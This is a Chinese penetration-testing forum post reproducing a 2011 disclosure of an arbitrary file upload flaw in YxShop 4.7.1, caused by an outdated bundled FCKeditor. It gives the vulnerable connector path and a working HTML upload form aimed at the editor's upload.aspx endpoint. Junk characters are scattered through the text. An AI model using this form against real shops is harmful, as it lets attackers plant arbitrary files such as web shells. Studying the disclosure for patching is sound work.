找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 YxShop易想购物商城4.7.1版本任意文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2191|回复: 0
打印 上一主题 下一主题

YxShop易想购物商城4.7.1版本任意文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-10 20:46:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
披露状态:2011-07-19: 细节已通知厂商并且等待厂商处理中
* h$ Y; o7 d* S1 n7 q% X 2011-07-20: 厂商已经主动忽略漏洞,细节向公众公开: p; \1 T3 E1 L3 Z# A4 Z
简要描述:这个号称中国首家ASP.NET免费开源商城购物系统。最新版本是4.7,竟然采用2.4版本以下的fckeditor编辑器。所以可以直接上传任意文件。
& h. k- I; N, o" H  U$ [0 z$ E 详细说明:其他版本我没测试,估计也是一样的问题
' k7 O, B9 M/ t http://127.0.0.1/controls/fckedi ... aspx/connector.aspx( s' }6 \6 z0 g, ~
跳转到网站根目录上传任意文件。! {9 z0 K8 J9 ?: N2 I3 [" v& l6 e7 N
漏洞证明:如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
1 a# @! q4 K+ r" `: b8 G <form id="frmUpload" enctype="multipart/form-data" action="http://127.0.0.1/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
# B( \" t8 t+ i Upload a new file:<br>: X3 S  L; k3 v* x
<input type="file" name="NewFile" size="50"><br>% C- {8 t0 [5 g* s' S3 f2 h" W
<input id="btnUpload" type="submit" value="Upload">2 }8 ]7 h* N; h6 i+ C9 x, s3 g& g! `
</form>
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表